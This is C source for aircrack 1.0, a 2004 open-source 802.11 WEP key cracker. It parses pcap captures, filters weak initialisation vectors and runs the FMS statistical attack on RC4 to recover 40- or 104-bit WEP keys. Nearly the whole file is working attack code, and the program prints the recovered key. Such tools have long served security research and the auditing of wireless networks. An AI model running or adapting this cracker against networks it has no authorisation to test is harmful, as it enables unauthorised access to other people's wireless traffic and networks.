/*
 *  802.11 40/104 bit WEP Key Cracker
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  Partly based on David Hulton's dwepcrack
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <getopt.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <time.h>

#include "pcap.h"

#define AMOD(x,y) ((x) % (y) < 0 ? ((x) % (y)) + (y) : (x) % (y))
#define SWAP(x,y) { unsigned char tmp = x; x = y; y = tmp; }

char usage[] =

"\n"
"  aircrack 1.0 - (C) 2004 Christophe Devine\n"
"\n"
"  usage: %s [options] <pcap filename(s)>\n"
"\n"
"      -b <bssid> : identifier of the network to crack\n"
"      -d <start> : debug - specify beginning of the key\n"
"      -f <fudge> : bruteforce fudge factor (default: 4)\n"
"      -k <keyid> : WEP KeyID to crack (0-3, default: 0)\n"
"      -n <nbits> : WEP key length (40/104, default: 40)\n"
"\n";

/* command-line parameters */

int bssid[6];                   /* AP's BSSID   */
int debug[13];                  /* partial key  */
int ffact  = 4;                 /* fudge factor */
int keyid  = 0;                 /* WEP KeyID    */
int weplen = 5;                 /* WEP key len. */

/* runtime global data */

unsigned char buffer[65536];    /* buffer for reading packets   */
unsigned char kcheck[8][10];    /* 8 packets to verify wepkey   */
unsigned char wepkey[13];       /* the current chosen WEP key   */
unsigned char *ivbuf[13];       /* potentially weak chosen ivs  */
unsigned long nb_ivs[13];       /* number of elements in ivbuf  */
unsigned long nb_enc_pkt;       /* number of encrypted packets  */
time_t tm_start, tm_prev;       /* for displaying elapsed time  */
char *test_unique_ivs;          /* to avoid adding duplicates   */

int tried;                      /* total # of keys tried so far */
int weaks[13];                  /* nb of weak ivs for each byte */
int fudge[13];                  /* bruteforce level (1 to 256)  */
int depth[13];                  /* how many tries done so far   */

struct byte_stat
{
    int index;
    int votes;
}
wpoll[13][256];                 /* FMS attack: statistical data */

int read_ivs( char *filename, int *nb_chk );
int do_wep_crack( int B );

int main( int argc, char *argv[] )
{
    int i, nb_chk;
    char *s;

    /* check the arguments */

    if( argc < 2 )
    {
    usage:
        printf( usage, argv[0] );
        return( 1 );
    }

    for( i = 0; i <  6; i++ ) bssid[i] = -1;
    for( i = 0; i < 13; i++ ) debug[i] = -1;

    while( 1 )
    {
        int option = getopt( argc, argv, "b:d:f:k:n:" );

        if( option < 0 ) break;

        switch( option )
        {
            case 'b':

                if( sscanf( optarg, "%x:%x:%x:%x:%x:%x",
                            &bssid[0], &bssid[1], &bssid[2],
                            &bssid[3], &bssid[4], &bssid[5] ) != 6 )
                    goto usage;

                for( i = 0; i < 6; i++ )
                    if( bssid[i] < 0 || bssid[i] > 255 )
                        goto usage;

                break;

            case 'd' :

                i = 0;
                s = optarg;

                while( sscanf( s, "%x", &debug[i] ) == 1 )
                {
                    if( debug[i] < 0 || debug[i] > 255 )
                        goto usage;

                    if( ++i == 13 ) break;

                    if( ! ( s = strchr( s, ':' ) ) )
                        break;

                    s++;
                }

                if( ! i ) goto usage;

                break;

            case 'f' :

                if( sscanf( optarg, "%d", &ffact ) != 1 )
                    goto usage;

                if( ffact < 1 )
                    goto usage;

                break;

            case 'k' :

                if( sscanf( optarg, "%d", &keyid ) != 1 )
                    goto usage;

                if( keyid < 0 || keyid > 3 )
                    goto usage;

                break;

            case 'n' :

                if( sscanf( optarg, "%d", &weplen ) != 1 )
                    goto usage;

                if( weplen != 40 && weplen != 104 )
                    goto usage;

                weplen /= 8;

                break;

            default : goto usage;
        }
    }

    if( ! ( argc - optind ) )
        goto usage;

    /* initialize all the data */

    nb_chk = 0;

    for( i = 0; i < 13; i++ )
    {
        if( ! ( ivbuf[i] = (unsigned char *)
                            malloc( 0x400000 ) ) )
        {
            perror( "malloc" );
            return( 1 );
        }

        nb_ivs[i] = 0;
    }

    nb_enc_pkt = 0;

    if( ! ( test_unique_ivs = (char *) malloc( 16777216 ) ) )
    {
        perror( "malloc" );
        return( 1 );
    }

    memset( test_unique_ivs, 0, 16777216 );

    /* read the packets from each file */

    while( optind != argc )
    {
        if( read_ivs( argv[optind], &nb_chk ) )
            return( 1 );

        optind++;
    }

    free( test_unique_ivs );

    if( nb_chk < 8 )
    {
        fprintf( stderr, "Could not get enought check packets!\n" );
        return( 1 );
    }

    /* launch the attack */

    printf( "\33[2J\33[2;34H\33[1maircrack 1.0\33[0m\n\n" ); 
    printf( "   * Got %ld unique IVs\n", nb_enc_pkt );

    tm_start = tm_prev = time( NULL );

    if( ! do_wep_crack( 0 ) )
    {
        printf( "\n\33[%dC\33[31;1mKEY FOUND! [", 28 - weplen );

        for( i = 0; i < weplen; i++ )
            printf( "%02X%c", wepkey[i],
                    ( i + 1 < weplen ) ? ':' : ']' );

        printf( "\33[0m\n\n" );
        return( 0 );
    }

    printf( "\n   No luck, sorry.\n\n" );
    return( 1 );
}

int read_ivs( char *filename, int *nb_chk )
{
    int n, infile;
    unsigned long cnt1;
    unsigned long cnt2;
    unsigned char *h80211;
    struct pcap_pkthdr pkh;
    struct pcap_file_header pfh;

    /* open the file and check the pcap header */

    printf( "Opening pcap file %s\n", filename );

    infile = open( filename, O_RDONLY | O_LARGEFILE );

    if( infile < 0 )
    {
        perror( "open" );
        return( 1 );
    }

    n = sizeof( struct pcap_file_header );

    if( read( infile, &pfh, n ) != n )
    {
        perror( "read" );
        return( 1 );
    }

    if( pfh.magic != TCPDUMP_MAGIC )
    {
        fprintf( stderr, "wrong magic from pcap file header\n"
                         "(got 0x%08X, expected 0x%08X)\n",
                         pfh.magic, TCPDUMP_MAGIC );
        return( 1 );
    }

    if( pfh.linktype != LINKTYPE_IEEE802_11 &&
        pfh.linktype != LINKTYPE_PRISM_HEADER )
    {
        fprintf( stderr, "unsupported hardware link type %d\n",
                 pfh.linktype );
        return( 1 );
    }

    tm_prev = time( NULL );

    cnt1 = cnt2 = 0;

    while( 1 )
    {
        int x, y, z, a, b, B = 0;

        /* every 1s, update the display */

        if( time( NULL ) - tm_prev >= 1 )
        {
            tm_prev = time( NULL );
            printf( "\r\33[2KReading packets: total = %ld"
                    ", usable = %ld\r", cnt1, cnt2 );
            fflush( stdout );
        }

        /* read one packet */

        n = sizeof( pkh );

        if( read( infile, &pkh, n ) != n )
            break;

        if( read( infile, buffer, pkh.len ) != (int) pkh.len )
            break;

        cnt1++;

        h80211 = buffer;

        if( pfh.linktype == LINKTYPE_PRISM_HEADER )
        {
            /* remove the prism header if necessary */

            n = *(int *)( h80211 + 4 );
            h80211 += n; pkh.len -= n;

            if( pkh.len <= 0 )
            {
                fprintf( stderr, "\nFIXME: wrong prism header size ?\n" );
                continue;
            }
        }

        if( pkh.len < 40 ) continue;

        /* is it a data packet ? */

        if( ( h80211[0] & 0x0C ) != 0x08 ) continue;

        /* is the data encrypted ? */

        if( ( h80211[1] & 0x40 ) != 0x40 ) continue;

        /* is it the correct keyid ? */

        if( ( h80211[27] >> 6 ) != keyid ) continue;

        /* if the bssid wasn't specified, grab the first one */

        if( bssid[0] == -1 )
        {
            bssid[0] = h80211[16]; bssid[1] = h80211[17];
            bssid[2] = h80211[18]; bssid[3] = h80211[19];
            bssid[4] = h80211[20]; bssid[5] = h80211[21];

            printf( "\33[2KChoosing first encrypted BSSID"
                    " = %02X:%02X:%02X:%02X:%02X:%02X\n",
                    bssid[0], bssid[1], bssid[2],
                    bssid[3], bssid[4], bssid[5] );
        }

        /* check if the bssids match */

        if( h80211[16] != bssid[0] || h80211[17] != bssid[1] ||
            h80211[18] != bssid[2] || h80211[19] != bssid[3] ||
            h80211[20] != bssid[4] || h80211[21] != bssid[5] )
            continue;

        /* have we already seen this IV ? */

        n = ( h80211[24] << 16 )
          | ( h80211[25] <<  8 )
          | ( h80211[26]       );

        if( test_unique_ivs[n] ) continue;

        test_unique_ivs[n] = 1;

        cnt2++; nb_enc_pkt++;

        if( *nb_chk < 8 )
        {
            /* this packet's first bytes will be used to check *
             * if the current chosen WEP key is the valid one  */

            memcpy( kcheck[*nb_chk], h80211 + 24, 10 );

            kcheck[*nb_chk][4] ^= 0xAA;
            kcheck[*nb_chk][5] ^= 0xAA;
            kcheck[*nb_chk][6] ^= 0x03;
/*
            kcheck[*nb_chk][7] ^= 0x00;
            kcheck[*nb_chk][8] ^= 0x00;
            kcheck[*nb_chk][9] ^= 0x00;
*/
            (*nb_chk)++;
        }

        /* now filter the IV using David Hulton's algorithm,  *
         * to reduce the total number of potentially weak IVs */

        x = h80211[24];
        y = h80211[25];
        z = h80211[26];

        a = ( x + y ) & 0xFF;
        b = AMOD( (x + y) - z, 256 );

        for( B = 0; B < 13; B++ )
        {
            /* I don't understand this, either - *
             * but it appears to work just fine. */

            if((((0 <= a && a < B) ||
             (a == B && b == (B + 1) * 2)) &&
             (B % 2 ? a != (B + 1) / 2 : 1)) ||
             (a == B + 1 && (B == 0 ? b == (B + 1) * 2 : 1)) ||
             (x == B + 3 && y == 255) ||
             (B != 0 && !(B % 2) ? (x == 1 && y == (B / 2) + 1) ||
             (x == (B / 2) + 2 && y == 255 - x) : 0))
            {
                /* could be a weak IV for keybyte B, so add it */

                ivbuf[B][(nb_ivs[B] << 2)    ] = h80211[24];
                ivbuf[B][(nb_ivs[B] << 2) + 1] = h80211[25];
                ivbuf[B][(nb_ivs[B] << 2) + 2] = h80211[26];

                /* also add the first byte of RC4's output - the *
                 * plaintext always starts by AA AA 03 00 00 00  */

                ivbuf[B][(nb_ivs[B] << 2) + 3] = h80211[28] ^ 0xAA;

                nb_ivs[B]++;
            }
        }
    }

    printf( "\r\33[2KReading packets: total = %ld"
            ", usable = %ld\n", cnt1, cnt2 );

    return( 0 );
}

/* this routine sets up the key schedule using wepkey and *
 * each 8 packets IV, then checks if RC4's output matches */

int check_wepkey( void )
{
    unsigned char S[256], K[16];
    int ntest, i, j, d, dmask;

    dmask = 3 + weplen - 1;

    memcpy( K + 3, wepkey, weplen );

    for( ntest = 0; ntest < 8; ntest++ )
    {
        for( i = 0; i < 256; i++ )
            S[i] = i;

        memcpy( K, kcheck[ntest], 3 );

        for( i = j = d = 0; i < 256; i++ )
        {
            j = ( j + S[i] + K[d]) & 0xFF;
            SWAP( S[i], S[j] );
            d++; d &= dmask;
        }

        for( i = 1, j = 0; i < 7; i++ )
        {
            j = ( j + S[i] ) & 0xFF;
            SWAP(S[i], S[j]);

            if( S[(S[i] + S[j]) & 0xFF] !=
                kcheck[ntest][3 + i] )
                return( 1 );
        }
    }

    return( 0 );
}

/* this routine displays a bunch of statistical   *
 * data about the current state of the FMS attack */

void show_stats( void )
{
    time_t delta;
    struct winsize ws;
    int i, j, et_h, et_m, et_s;

    tm_prev = time( NULL );
    delta = tm_prev - tm_start;

    if( ioctl( 0, TIOCGWINSZ, &ws ) < 0 )
    {
        ws.ws_row = 25;
        ws.ws_col = 80;
    }

    if( ! delta ) delta++;

    et_h =   delta / 3600;
    et_m = ( delta - et_h * 3600 ) / 60;
    et_s =   delta - et_h * 3600 - et_m * 60;

    printf( "\33[5;1H" );

    printf( "   * Elapsed time [%02d:%02d:%02d]\n", et_h, et_m, et_s  );
    printf( "   * Tried %d keys at %ld k/s\n", tried, tried / delta );
    printf( "   * Current [" );

    for( i = 0; i < weplen; i++ )
        printf( "%02X%c", wepkey[i],
                ( i + 1 < weplen ) ? ':' : ']' );

    printf( "\n\n" );

    for( i = 0; i < weplen; i++ )
    {
        int k = ( ws.ws_col - 52 ) / 8;

        printf( "\33[2K   Byte %2d: weaks =%5d%c depth =%3d/"
                "%3d, best = ", i, weaks[i], ( weaks[i] < 60 ) ?
                '!' : ' ', depth[i], fudge[i] );

        for( j = depth[i]; j < depth[i] + k; j++ )
        {
            printf( "%02X(%3d) ", wpoll[i][j].index,
                                  wpoll[i][j].votes );
            if( j >= 255 ) break;
        }

        printf( "\n" );
    }

    printf( "\33[J" );
    fflush( stdout );
}

/* routine used to sort the votes */

int cmp_votes( const void *bs1, const void *bs2 )
{
    if( ((struct byte_stat *) bs1)->votes <
        ((struct byte_stat *) bs2)->votes )
        return(  1 );

    if( ((struct byte_stat *) bs1)->votes >
        ((struct byte_stat *) bs2)->votes )
        return( -1 );

    return( 0 );
}

/* this recursive routine performs the FMS attack itself */

int do_wep_crack( int B )
{
    unsigned char R[256];
    unsigned char S[256];
    unsigned char K[16];
    unsigned char X, E;
    unsigned long n;
    int i, j, d;

    weaks[B] = 0;

    for( i = 0; i < 256; i++ )
    {
        wpoll[B][i].index = i;
        wpoll[B][i].votes = 0;
        R[i] = i;
    }

    if( B ) memcpy( K + 3, wepkey, B );

    /* loop through our collection of potentially weak IVs */

    for( n = 0; n < 4 * nb_ivs[B]; n += 4 )
    {
        memcpy( K, &ivbuf[B][n], 3 );
        memcpy( S, R, 256 );

        /* reproduce the  first 3 + B steps of the KSA */

        for( i = j = d = 0; i < 3 + B; i++, d++ )
        {
            j = ( j + S[i] + K[d]) & 0xFF;
            SWAP( S[i], S[j] );
        }

        if( S[1] < 3 + B && ( ( S[1] + S[S[1]] ) & 0xFF ) == 3 + B )
        {
            /* this IV is weak for the current wepkey  *
             * so reverse the byte E and cast the vote */

            weaks[B]++;

            X = ivbuf[B][n + 3];

            for( i = 0; i < 256; i++ )
                if( S[i] == X )
                    break;

            /* E could be the Bth keybyte */

            E = ( i - j - S[3 + B] ) & 0xFF;

            wpoll[B][E].votes++;
        }
    }

    /* sort the votes, highest ones first */

    qsort( wpoll[B], 256, sizeof( struct byte_stat ), cmp_votes );

    /* see how far we should go based on the number of weaks ivs */

    fudge[B] = 1;

    if( debug[B] == -1 && weaks[B] < 192 )
    {
        fudge[B] = (8 * ffact * (12 - (70 * weaks[B]) / 1024)) / 16;
        if( B == 0 ) fudge[B] *= 4;
        if( B == 1 ) fudge[B] *= 2;
    }

    if( fudge[B] <=  0 ) fudge[B] =   1;
    if( fudge[B] > 256 ) fudge[B] = 256;

    /* try the most likely n votes, where n is our current fudge */ 

    for( depth[B] = 0; depth[B] < fudge[B]; depth[B]++ )
    {
        wepkey[B] = ( debug[B] >= 0 ) ? debug[B]
                    : wpoll[B][depth[B]].index;

        if( B < weplen - 1 )
        {
            /* this keybyte has been set, attack the next one */

            if( ! do_wep_crack( B + 1 ) )
                return( 0 );
        }
        else
        {
            /* last keybyte reached, so check if wepkey is valid */

            tried++;

            /* every second, display some stats */

            if( time( NULL ) - tm_prev >= 1 )
                show_stats();

            if( ! check_wepkey() )
            {
                /* we have a valid key */

                show_stats();
                return( 0 );
            }
        }
    }

    return( 1 );
}
